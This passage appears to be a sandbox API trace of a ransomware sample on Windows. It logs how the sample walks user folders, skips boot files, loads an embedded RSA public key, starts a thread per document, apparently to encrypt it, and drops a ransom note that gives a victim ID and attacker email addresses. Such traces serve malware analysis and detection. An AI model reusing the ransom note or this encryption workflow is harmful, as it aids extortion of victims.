0x4b8 [0041.853] Sleep (dwMilliseconds=0x96) [0042.032] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0042.032] lstrcmpW (lpString1="ZjfGK_.odt", lpString2="..") returned 1 [0042.032] lstrcmpW (lpString1="ZjfGK_.odt", lpString2=".") returned 1 [0042.032] StrStrW (lpFirst="ZjfGK_.odt", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0042.032] StrStrW (lpFirst="ZjfGK_.odt", lpSrch="ntldr") returned 0x0 [0042.032] StrStrW (lpFirst="ZjfGK_.odt", lpSrch="NTLDR") returned 0x0 [0042.032] StrStrW (lpFirst="ZjfGK_.odt", lpSrch="NTDETECT.COM") returned 0x0 [0042.032] StrStrW (lpFirst="ZjfGK_.odt", lpSrch="ntdetect.com") returned 0x0 [0042.032] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpSrch="Desktop") returned 0x0 [0042.032] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpSrch="DESKTOP") returned 0x0 [0042.032] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned 81 [0042.032] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0042.032] lstrcpyW (in: lpString1=0x17addc, lpString2="ZjfGK_.odt" | out: lpString1="ZjfGK_.odt") returned="ZjfGK_.odt" [0042.032] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0042.032] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4a4 [0042.033] Sleep (dwMilliseconds=0x96) [0042.194] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0 [0042.194] FindClose (in: hFindFile=0x42e53d0 | out: hFindFile=0x42e53d0) returned 1 [0042.194] FindClose (in: hFindFile=0x42e53d0 | out: hFindFile=0x42e53d0) returned 0 [0042.194] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1" [0042.194] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\*.*" [0042.194] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpSrch="Desktop") returned 0x0 [0042.194] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpSrch="DESKTOP") returned 0x0 [0042.194] SetErrorMode (uMode=0x1) returned 0x1 [0042.194] wsprintfW (in: param_1=0x17a39c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\_HELP_INSTRUCTION.TXT") returned 98 [0042.195] GetUserNameW (in: lpBuffer=0x178178, pcbBuffer=0x177f64 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x177f64) returned 1 [0042.195] wsprintfW (in: param_1=0x177f70, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0042.195] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x177f6c | out: phkResult=0x177f6c*=0x4b0) returned 0x0 [0042.195] RegQueryValueExW (in: hKey=0x4b0, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3e116f8, lpcbData=0x177f68*=0x104 | out: lpType=0x0, lpData=0x3e116f8*=0x65, lpcbData=0x177f68*=0x4a) returned 0x0 [0042.195] RegCloseKey (hKey=0x4b0) returned 0x0 [0042.195] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17939c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0042.195] wsprintfW (in: param_1=0x17839c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0042.195] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\ikpxup8ushighl1\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.195] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\ikpxup8ushighl1\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4b0 [0042.196] WriteFile (in: hFile=0x4b0, lpBuffer=0x17839c*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x178394, lpOverlapped=0x0 | out: lpBuffer=0x17839c*, lpNumberOfBytesWritten=0x178394*=0x2c4, lpOverlapped=0x0) returned 1 [0042.196] CloseHandle (hObject=0x4b0) returned 1 [0042.197] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x42e53d0 [0042.197] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1") returned="IkpxUp8UshIgHl1" [0042.197] lstrcpyW (in: lpString1=0x17a5a4, lpString2="IkpxUp8UshIgHl1" | out: lpString1="IkpxUp8UshIgHl1") returned="IkpxUp8UshIgHl1" [0042.197] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.197] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.197] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0042.197] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.197] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0042.197] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0042.197] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0042.197] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0042.197] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0042.197] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0042.197] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0042.197] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0042.197] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0 [0042.197] FindClose (in: hFindFile=0x42e53d0 | out: hFindFile=0x42e53d0) returned 1 [0042.197] FindClose (in: hFindFile=0x42e53d0 | out: hFindFile=0x42e53d0) returned 0 [0042.197] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0042.197] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0042.197] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0042.198] lstrcmpW (lpString1="ZW28zqHzfxAY2NV", lpString2="..") returned 1 [0042.198] lstrcmpW (lpString1="ZW28zqHzfxAY2NV", lpString2=".") returned 1 [0042.198] lstrcpyW (in: lpString1=0x17c4d0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa" [0042.198] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0042.198] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpString2="ZW28zqHzfxAY2NV" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV" [0042.198] SetErrorMode (uMode=0x1) returned 0x1 [0042.198] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV" [0042.198] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0042.198] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0042.198] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\*.*" [0042.198] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x42e53d0 [0042.198] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV") returned="ZW28zqHzfxAY2NV" [0042.198] lstrcpyW (in: lpString1=0x17a5a4, lpString2="ZW28zqHzfxAY2NV" | out: lpString1="ZW28zqHzfxAY2NV") returned="ZW28zqHzfxAY2NV" [0042.198] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0042.198] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0042.198] lstrcmpW (lpString1="hcLzjn0RCFG.odp", lpString2="..") returned 1 [0042.198] lstrcmpW (lpString1="hcLzjn0RCFG.odp", lpString2=".") returned 1 [0042.198] StrStrW (lpFirst="hcLzjn0RCFG.odp", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0042.198] StrStrW (lpFirst="hcLzjn0RCFG.odp", lpSrch="ntldr") returned 0x0 [0042.198] StrStrW (lpFirst="hcLzjn0RCFG.odp", lpSrch="NTLDR") returned 0x0 [0042.198] StrStrW (lpFirst="hcLzjn0RCFG.odp", lpSrch="NTDETECT.COM") returned 0x0 [0042.198] StrStrW (lpFirst="hcLzjn0RCFG.odp", lpSrch="ntdetect.com") returned 0x0 [0042.199] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="Desktop") returned 0x0 [0042.199] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="DESKTOP") returned 0x0 [0042.199] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned 81 [0042.199] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0042.199] lstrcpyW (in: lpString1=0x17addc, lpString2="hcLzjn0RCFG.odp" | out: lpString1="hcLzjn0RCFG.odp") returned="hcLzjn0RCFG.odp" [0042.199] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0042.199] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4d0 [0042.199] Sleep (dwMilliseconds=0x96) [0042.350] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0042.350] lstrcmpW (lpString1="IcF1qMW8Ow.doc", lpString2="..") returned 1 [0042.350] lstrcmpW (lpString1="IcF1qMW8Ow.doc", lpString2=".") returned 1 [0042.350] StrStrW (lpFirst="IcF1qMW8Ow.doc", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0042.350] StrStrW (lpFirst="IcF1qMW8Ow.doc", lpSrch="ntldr") returned 0x0 [0042.350] StrStrW (lpFirst="IcF1qMW8Ow.doc", lpSrch="NTLDR") returned 0x0 [0042.350] StrStrW (lpFirst="IcF1qMW8Ow.doc", lpSrch="NTDETECT.COM") returned 0x0 [0042.350] StrStrW (lpFirst="IcF1qMW8Ow.doc", lpSrch="ntdetect.com") returned 0x0 [0042.350] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="Desktop") returned 0x0 [0042.350] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="DESKTOP") returned 0x0 [0042.350] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned 81 [0042.350] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0042.350] lstrcpyW (in: lpString1=0x17addc, lpString2="IcF1qMW8Ow.doc" | out: lpString1="IcF1qMW8Ow.doc") returned="IcF1qMW8Ow.doc" [0042.350] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0042.350] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4cc [0042.351] Sleep (dwMilliseconds=0x96) [0042.534] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0042.534] lstrcmpW (lpString1="Ld7trnreSqi.doc", lpString2="..") returned 1 [0042.534] lstrcmpW (lpString1="Ld7trnreSqi.doc", lpString2=".") returned 1 [0042.534] StrStrW (lpFirst="Ld7trnreSqi.doc", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0042.534] StrStrW (lpFirst="Ld7trnreSqi.doc", lpSrch="ntldr") returned 0x0 [0042.534] StrStrW (lpFirst="Ld7trnreSqi.doc", lpSrch="NTLDR") returned 0x0 [0042.534] StrStrW (lpFirst="Ld7trnreSqi.doc", lpSrch="NTDETECT.COM") returned 0x0 [0042.534] StrStrW (lpFirst="Ld7trnreSqi.doc", lpSrch="ntdetect.com") returned 0x0 [0042.534] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="Desktop") returned 0x0 [0042.534] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="DESKTOP") returned 0x0 [0042.534] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned 81 [0042.534] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0042.534] lstrcpyW (in: lpString1=0x17addc, lpString2="Ld7trnreSqi.doc" | out: lpString1="Ld7trnreSqi.doc") returned="Ld7trnreSqi.doc" [0042.534] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0042.535] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4d8 [0042.535] Sleep (dwMilliseconds=0x96) [0042.765] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0042.765] lstrcmpW (lpString1="nmyti-BLd1o.xlsx", lpString2="..") returned 1 [0042.765] lstrcmpW (lpString1="nmyti-BLd1o.xlsx", lpString2=".") returned 1 [0042.765] StrStrW (lpFirst="nmyti-BLd1o.xlsx", 